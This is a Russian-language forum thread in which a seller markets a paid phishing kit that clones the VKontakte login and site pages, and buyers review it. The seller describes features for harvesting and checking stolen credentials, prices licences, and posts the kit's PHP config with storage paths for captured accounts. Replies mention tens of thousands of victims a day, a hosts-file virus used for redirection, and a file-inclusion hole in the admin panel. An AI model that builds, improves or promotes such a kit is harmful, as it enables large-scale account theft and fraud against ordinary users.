Просмотр полной версии : Обновление знаменитого Фейка! Старым клиентам скидка!
Вышло обновление
http://forum.antichat.ru/showthread.php?p=1892877#post1892877
Файл admin.php перенесити в папку /admin (ибо я забыл это сделать, когда снимал привязку)
Продаю сорцы с последующим правом на авторство. Подробности в icq
Всем привет.
Наконецтаки удалось разрешить свои личные проблемы, и выделить время для написания обновления фейка. (прежняя версия betta 2.0)
Исходники старой версии были утеряны, поэтому новый фейк писался с нуля.
В новой версии я помаксимум учел пожелания предыдущих клиентов, и свои ошибки. Чтото добавил, чтото вырезал. В итоге получилась "конфетка", которая самому понравилась.
Что касается самого кода: она был максимально оптимизирован, большое внимание уделялось нагрузке и скорости работы скрипта. В этой версии открыт практически весь код. Т.е вы можете сами добавлять страницы, править как вам угодно и тд.
Что касется дизайна: он координально отличается от предыдущего. Простоту и удобство нового дизайна можете оценить сами:
http://s59.radikal.ru/i163/0908/46/3db508d7b44b.jpg
http://i045.radikal.ru/0908/19/6f2c2dddc59b.jpg
http://s48.radikal.ru/i122/0908/d9/6ce12b118834.jpg
Для тех кто незнаком с моей старой версией опишу основные возможности новой версии (betta 3.0)
1. Проверка вводимых данных (логин и пароль подвергается многим проверкам).
В случае несоответсвия вводимых данных с шаблоном, выскакивает табличка с ошибкой авторизации (как на оффициальном сайте)
В случае успешной авторизации, юзера перекидывает на его личную страницу или страницу, которую укажите вы (это настраивается в конфиге фейка)
2. Теперь стали активны практически все страницы сайта. (Лицевая index, сама страница авторизации login, страница регистрации, даже демки с описанием сайта и служба восстановления пароля)
Т.о у юзера складывается впечатление что он попал на реальный сайт, в котором активны все страницы.
3. Конешно стоит проверка на дубликаты аков.
4. Имеется счетчик посещений, отображает колличетсво юзеров, посетивших ваш фейк. Обновляется каждую полноч
5. График, отображающий активность ввода пароля.
Тем самым, на основании данных пунтка 4 и 5 вы можете судить о эффективности своей работы.
Вобщем дохера чего еще там есть, как говориться лучше 1 раз увидеть и самому все потрогать, поэтому предоставляю вашему вниманию демонстраицонную версию:
Для работы необходим:
php5
желательно библиотека gd (для отображения гарфика посещаемости)
zendoptimizer
Что касается стоимости данного фейка.
[COLOR=DarkOrange]Лицензия 1 фейка (домен:IP:лицо) - 10 $ (как и прежде)
Что касается "лицо" Я буду иметь дело только с тем человеком, который у меня покупал лицензию. Передачу домена в другие руки будет считаться как расторжение договора.
каждая последующая лицензия со скидкой в 50%
Смена лицензии на домен или IP (по причины бана) - бесплатно, при условии что старые: домен, IP не будут использоваться в дальнейшем.
Старым клиентам обновление будет стоить со скидкой в 50%. (номера icq всех старых клиентов у меня есть так что не пытайтесь обмануть)
ICQ для связи 195965421
Заранее просьба, если вас чтото не устроило в данном посту - то гуляйте лесом. Мне далеко по*** на ваше мнение =)
Вся информация и скрипты предоставлены лишь для ознакомления. Автор не нисет никакой ответсвенности за последствия, понесенные вследствии использования данной продукции и иформации.
затестил этот фейк, лучше админки к фейку не видел +1
0o.IG.o0
01.09.2009, 00:16
юзал ранние версии фейка достаточно давно (юзаю и по сей день) функционал (в т.ч админка) очень радует (лучший паблик-продукт) + доработанная система авторизации фейка вообще супер =) если ещё и цену учитывать.... вообщем я окончательно остановился на этом продукте ;)
amendron
01.09.2009, 01:47
отличный фейк жаль что вышел паблик продажи
0o.IG.o0
02.09.2009, 14:07
кстати, хочу заметить, что отдача значительно повысилась в связи с добавлением в фейк полной структуры страниц контакта
Ups
P.S. фейк написан на ООП, т.е функции можно применять к абсолютно любому сайту, сохранив админку и все остальное как в демке.
wildshaman
03.09.2009, 17:14
Какбе в примере локал инклуд :(
Какбе в примере локал инклуд :(
ты о чемс?
что могу сказать фейк обычный вот только админка другая и все самому такое можно сделать или даже в паблике найти
-=Zhenek=-
04.09.2009, 11:48
Проканает если фейки на 10 доменах и одна админка для них.
Если да,то сделай статистику с какого домена сколько переходов и аков.
Если сделаешь то я куплю....
-=MeDved=-
04.09.2009, 12:01
фейк норм
Проканает если фейки на 10 доменах и одна админка для них.
Если да,то сделай статистику с какого домена сколько переходов и аков.
Если сделаешь то я куплю....
сделать реально, только нагрузка будет..а я всегда пытался ее избежать.....Это уже будет целый api, соответсвно работа не на 10$, а как индивидуальный заказ, скрипт потом тупо заливаешь на любой сервер и он будет связан с главным. Недавно с партнером реализовывали такую шнягу..... без mysql будет трудно обойтись, но если надумаешь пиши в PM, чтонить придумаем
что могу сказать фейк обычный вот только админка другая и все самому такое можно сделать или даже в паблике найти
никто не спорит...все можно сделать самому, я сам этот фейк писал 2 ночи.... Просто не все шарют в php, я и предлагаю готовое решение.
-=Zhenek=-
04.09.2009, 23:20
Почему сложно?
Просто при переходе с фейка будет передавать со скрытого поля или ИД или адрес сайта.
При получении обрабатывать и все.
Пару функции сделать.
мой фейк посещают 40-50 тыс человек в день... а если у меня такихх доменов 10 то это уже 400-500 тыс запросов на главный сервер.... Если тебе пофиг на нагрузку - делай через скрытое поле, пиши свои "пару функций"... Только не удивляйся если сервак потом упадет =)
PS без mysql будет сложно
-=Zhenek=-
05.09.2009, 00:21
У меня уже подобное наботает,только вся трабла для меня базу вручную сливать..
Просто фейк у меня для немного других целей. кроме аков он работает как тдс.
Поэтому у меня проходит через него мало аков.И для меня нагрузка неважна.
пиши свои "пару функций"...
Да как я понял лучше написать самому чем разговаривать с создателем которому по* на продукт )
вывод сделал отсюдова :
Заранее просьба, если вас чтото не устроило в данном посту - то гуляйте лесом. Мне далеко по*** на ваше мнение =)
Особенно последние 6-7 слов.
=)я не твоя мамочка, чтобы помогать тебе сделать домашнее Задание. Все что я хотел - я сделал и оценил продукт достойной (на мой взгляд, по отношению к проделанной работы) ценой.
Если ты хочешь апгрейтов - пиши в ПМ и мы обсудим. Хочешь качественно - плати деньги.
Что касается " последние 6-7 слов. ".
Это касалось флудеров и всяких кадров, которых хлебом не корми, лиж бы оставить цитату в посту. Поэтому и хотел модеров освободить от лишней работы, по затиранию безсмысленных постов.
Я буду адвекватно воспринимать любую критику по предоставляемому мною продукту, и буду сам делать выводы о доработке.
-=Zhenek=-
05.09.2009, 15:23
Я написал насчет апгрейда тут. ты сказал что не будешь делать.
Можно было сделать для меня отдельную версию. А для тех у кого 400к в день пусть юзают эту.
Это естественно было не бесплатно.
Но я лучше сам сделю.
Удачи в бизнесе.
Я написал насчет апгрейда тут. ты сказал что не будешь делать.
Можно было сделать для меня отдельную версию. А для тех у кого 400к в день пусть юзают эту.
Это естественно было не бесплатно.
Но я лучше сам сделю.
Удачи в бизнесе.
удачи школьник
-=Zhenek=-
05.09.2009, 18:49
удачи школьник
Я тебя не оскорблял и меня не надо.
Я уже далеко не школьник как по возрасту так и по развитию.
По разговору с тобой понял что ты неадекват.
Хочешь поприпираться пиши в асю. На аве
для жалоб недовольных есть отдельная ветка, зря тему мусором не засоряй...я с самого начала сказал, если хочешь что сказать - пиши в PM...
мой фейк посещают 40-50 тыс человек в день... а если у меня такихх доменов 10 то это уже 400-500 тыс запросов на главный сервер.... Если тебе пофиг на нагрузку - делай через скрытое поле, пиши свои "пару функций"... Только не удивляйся если сервак потом упадет =)
PS без mysql будет сложно
как ты добился 40-50 тыс в день???
это почти нереально!!!
а вот в фейкии ничего революционного не видел!
и демо админка пустая слишком,и счетчик на главной странице не обновляется.
У меня ? к ТС ты как всё сам заливаешь на домен и я только пользоваюсь админкой?или ты мне доступ к ftp дашь???
>как ты добился 40-50 тыс в день???
думаю нет смысла раскрывать свои секреты.
>это почти нереально!!
как знать, спорить не буду имхо
>и демо админка пустая слишком,и счетчик на главной странице не обновляется.
это уже непервая моя версия фейка, и я имел дело со многими людьми. Судя из предыдушего опыта я оставил помаксимум нужны возможности. Да и потом это вам не CMS а всеголишь фейк с приятной для глаз админкой.
что касается счетчка, то он обновляется как на официальном сайте. в конфиг даже вынес отдельную пеоременную, в которую можно водить значение: количетсво зарегенных юзеров, отталкиваясь от этого значение число будет постояноо расти
$total_vk_users='41814500'; //колличетсво юзеров зарегенный на сайте вк (число будет постоянно увеличваться на главной странцие фейка)
>к ТС ты как всё сам заливаешь на домен и я только пользоваюсь админкой?или ты мне доступ к ftp дашь???
А тут уже пожеланию. Я вам предоставляю полностью рабочий скрипт. ВЫ заливаете его себе на хостинг, говорите мне IP и домен, а я вам ключ. Без ключа скрипт не будет работать. Если что не получилось могу и сам за вас залить и настроить.
вот конфиг. может кому интересно. Тут собраны основные настройки
<?
$admin_login="root"; // логин для админки
$admin_pass="root"; // пароль для админки
$redirect_to = "photo34362276_128154315"; //куда будем редиректить юзера, в случае удачно авторизации
$anket_or_red="1"; // если 1, то редиректить будет на адрес $redirect_to, если 0 то юзера перекинет на свою анкету
$total_vk_users='41814500'; //колличетсво юзеров зарегенный на сайте вк (число будет постоянно увеличваться на главной странцие фейка)
$lic_key=""; //лицензия
/////////////////////////////// начало настроек, которые лучше не трогать ///////////////////////////
//error_reporting(0); // отключаем логирование ошибок, во время работы фейка раскоментируйте эту строчку, т.е удалить // в начае строки
set_time_limit(0); //время выполнения скрипта ставим на бесконечное
$dir="secret"; // путь к папке со всеми файлами, касающихся аков итд
$dir_acs=$dir."/acs"; // путь к акам
$file_ac=$dir."/currents_acs.dat"; // текущий файл с аками.
$dir_counter=$dir."/counters"; // путь до отчетов счетчика посещений.
$dir_backup=$dir."/backups"; // путь до папки с бэкапами аков.
/////////////////////////////// конец настроек, которые лучше не трогать ///////////////////////////
?>
Работает все отлично. ТС даже помог мне настроить все на хостинге. Респект.!
Nightmarе
13.09.2009, 11:20
http://o.0ot.ru/admin/admin.php?file_way=admin.php
Админка дырявая как дуршлаг. А многие её могут повесить на крупные сайты, вот подумайте ;)
http://o.0ot.ru/admin/admin.php?file_way=admin.php
Админка дырявая как дуршлаг. А многие её могут повесить на крупные сайты, вот подумайте ;)
xD ты такой умный??? тебе череп не жмет???
>http://o.0ot.ru/admin/admin.php?file_way=admin.php
подставил в гет запросы ссылку на скачку файла админки, ха ха и что тебе это дало??? Ты сможешь это сделать с наружи фейка???
>Админка дырявая как дуршлаг.
Раз уж такой умный, специально для тебя могу залить копию этого фейка, но пароли от админки я тебе не скажу. И если тебе удасться чтонибудь из нее выкачать то тогда я признаю что касяки есть =)... а пока что не смушай народ.
Дыр в фейке нет, незная пароля от админки, снаружи никак навредить его содержимому нельзя.
Да и потом хотелось бы еще раз подметить. Я писал вам не кмс а фейк.
Приобрел данный скрипт-фейк. Качеством доволен, благодарю автора и желаю продвижения в дальнейшем создании подобных скриптов и не только ;)
Небольшая недоделка - бага с языками, не переключаются языки (там где ниже "В Контакте © 2006-2009", при нажатии на квадратик определенной страны).
Да, и автор скоро устранит эту проблему, тем более этот элемент не так и важен)
как и обещал сделал обновление, исправлены дизайны всех страниц в соответсвии с полседними изменениями на официальном сайте, а также добавил в кофинг еще 1 возможность: редирект на вашу страницу, после авторизации пользователя.
Хотел бы напомнить что код дизайна открытый, так что вы сами можете править его под себя, как вам всдумаеться.
А ты мне не расскажешь как ты так часто апааешь тему и твою тему еще не закрыли???
Это же прямое нарушение правил!!!
3) Добавления к правилам, поправки:
3. C 15.09.2008 запрещается АП'ать тему чаще одного раза в 4 суток. АП'ом так же считается пост топикстартера с любым содержанием созданный после другого поста раньше чем через 4 суток.
А ты мне не расскажешь как ты так часто апааешь тему и твою тему еще не закрыли???
По теме фейка не услышал ничего конкретного так что гуляй лесом. =) Заведи девушку и следи токо за собой
Уважаемый Зникир, у вас репа, потому что вы посты набиваете таким образом? Лишь бы где можно было флудануть, лишь бы куда впостить свой пост вонючий.
ТС молодец, и еще мало принимает оплату за фейк - 300 рублей. Ему вообще надо сделать абон. плату месячную, и чтобы платили каждый месяц. Я вот ему указал - недоделка там то и там-то, так он на следующий день исправил всё и выдал всем обновление, что означает - селлер подходит к своей теме серьёзно, и внимательно следит за обновлениями в системе.
Фейк - идеальный. Полностью логичная взаимосвязь, придумано со вкусом.
El.DI@BL0
16.09.2009, 23:53
Купил товар. Как прошлому клиенту, ТС сделал скидку, помог с установкой. Советую!
KommersantTS
19.09.2009, 14:03
купил продукт, ТС очень помог в различных вопросах, приятно иметь дело))
До 22 сентября акция:
Каждому постучавшему в icq 444-567-четрые 73 Лицензия на 1 домен - БЕСПЛАТНА
При условии, что КАЖДЫЙ тестер оставит отзыв здесь.
PS. Не пишите про меня, я хачу слышать критику на счет товара. Ваше пожелания и дополнения!
maks777777
20.09.2009, 19:36
Акция это хорошо.) Сервис 5+
Акция это хорошо.) Сервис 5+
акция акцией.
Не слышу ничего про сам фейк.
>http://o.0ot.ru/admin/admin.php?file_way=admin.php
подставил в гет запросы ссылку на скачку файла админки, ха ха и что тебе это дало??? Ты сможешь это сделать с наружи фейка???
скрипты, которые ты продаешь можно слить бесплатно с твоего же тестового фэйка
качай, дезендь, делай что хочешь - мне по***..
А если установить не получиться - ты мне пиши...Я помогу... =)))
Я же бля безкорстыный, работаю за спасиибо
Nightmarе
22.09.2009, 17:11
Неправильную политику ведёте, главное продать, а то что товар не работает это никого не касается.
+ оскорбил клиента. Используешь зенд, ты отвечаешь за его работу, а не клиент. То что зенд не пашет, ТВОЯ ошибка а не клиентов. Про регистрацию домена vkontakte.ru отдельная жесть.
Блек будет обоснован.
ТЫ видимо переписку читал через строки.... Фейк помог настроить, http://vk-files.ru/ вот его сайт с работающим фейкам... То что он не может адаптирвоать хостинг под вирус hosts - не мои проблемиы.... Я продовал фейк, про HOSST ни слова не говорил...
Если клиент лам - его проблемы....
>Неправильную политику ведёте, главное продать, а то что товар не работает это никого не касается.
Если бы ты прочитал переписку от и до, то нашел бы там стрчоку, в которой я говорю, что деньги заплатите после того как уббедитесь что atrqr полностью работает.... Я настроил - ТС убедился и заплатил...
Продаю исходники с последующим право на авторство. Цена 50$. Кому интересно пишем в icq
Файл admin.php перенесити в папку /admin (ибо я забыл это сделать, когда снимал привязку)
ТС стукни 360954553
хочу обновится, покупал старую версию фейка :)
Чето не фурычит паблик:((( ввожу логин пароль, он кидает на /login.php и ни чего не происходит:( Просто белая страница:(
ТС стукни 360954553
хочу обновится, покупал старую версию фейка :)
обновляйся с паблика
Чето не фурычит паблик:((( ввожу логин пароль, он кидает на /login.php и ни чего не происходит:( Просто белая страница:(
Значит заливал на FTP не в бинарном режиме скрипты. Юзай TC
Касается всех пользователей продукта??
Обновление фейка делать?, если да, то что хотите?
У меня в планах сделать проверку на валидность ака с антикапчей (по выбору)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot